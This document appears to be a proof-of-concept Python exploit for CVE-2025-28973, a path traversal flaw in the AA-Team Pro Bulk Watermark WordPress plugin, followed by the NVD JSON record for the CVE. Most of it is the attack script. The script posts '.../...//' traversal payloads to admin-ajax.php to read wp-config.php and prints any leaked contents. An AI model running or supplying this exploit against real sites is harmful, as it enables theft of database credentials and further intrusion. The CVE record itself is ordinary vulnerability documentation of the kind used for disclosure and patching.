CVE-2025-28973

# CVE-2025-28973 Path Traversal PoC # Target: AA-Team Pro Bulk Watermark Plugin for WordPress (<=2.0) # Vulnerability: Path Traversal via '.../...//' sequence import requests import sys target_url = "http://target-wordpress-site.com" def exploit_path_traversal(target_url, target_file): """ Exploit the path traversal vulnerability to read arbitrary files """ # Construct the path traversal payload # Using '.../...//' sequence to bypass filters traversal_path = ".../...//" * 5 + target_file # WordPress admin endpoint for bulk watermark processing endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious request data = { "action": "pro_bulk_watermark_process", "source_path": traversal_path, "watermark_type": "text", "watermark_text": "Test" } # Send the exploit request try: response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[*] Request sent successfully") print(f"[*] Payload: {traversal_path}") print(f"[*] Response length: {len(response.text)}") # Check if file content was returned if len(response.text) > 0 and "<?php" not in response.text[:100]: print("[+] File content may have been leaked") print(response.text[:500]) else: print("[*] Response received, check manually") else: print(f"[!] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) > 1: target_url = sys.argv[1] # Target files to read target_files = [ "wp-config.php", "../../../../wp-config.php", ".../...//.../...//.../...//wp-config.php" ] print("CVE-2025-28973 Path Traversal Exploit") print("=" * 50) for target_file in target_files: print(f"\n[*] Attempting to read: {target_file}") exploit_path_traversal(target_url, target_file)

{"cve": {"id": "CVE-2025-28973", "sourceIdentifier": "[email protected]", "published": "2025-12-31T20:15:42.207", "lastModified": "2026-04-29T10:16:44.113", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path Traversal: '.../...//' vulnerability in AA-Team Pro Bulk Watermark Plugin for WordPress pro-watermark allows Path Traversal.This issue affects Pro Bulk Watermark Plugin for WordPress: from n/a through <= 2.0."}, {"lang": "es", "value": "Salto de ruta: '.../...//' vulnerabilidad en el plugin AA-Team Pro Bulk Watermark para WordPress permite el salto de ruta. Este problema afecta a Pro Bulk Watermark Plugin para WordPress: desde n/a hasta 2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/pro-watermark/vulnerability/wordpress-pro-bulk-watermark-plugin-for-wordpress-2-0-path-traversal-vulnerability?_s_id=cve", "source": "[email protected]"}]}}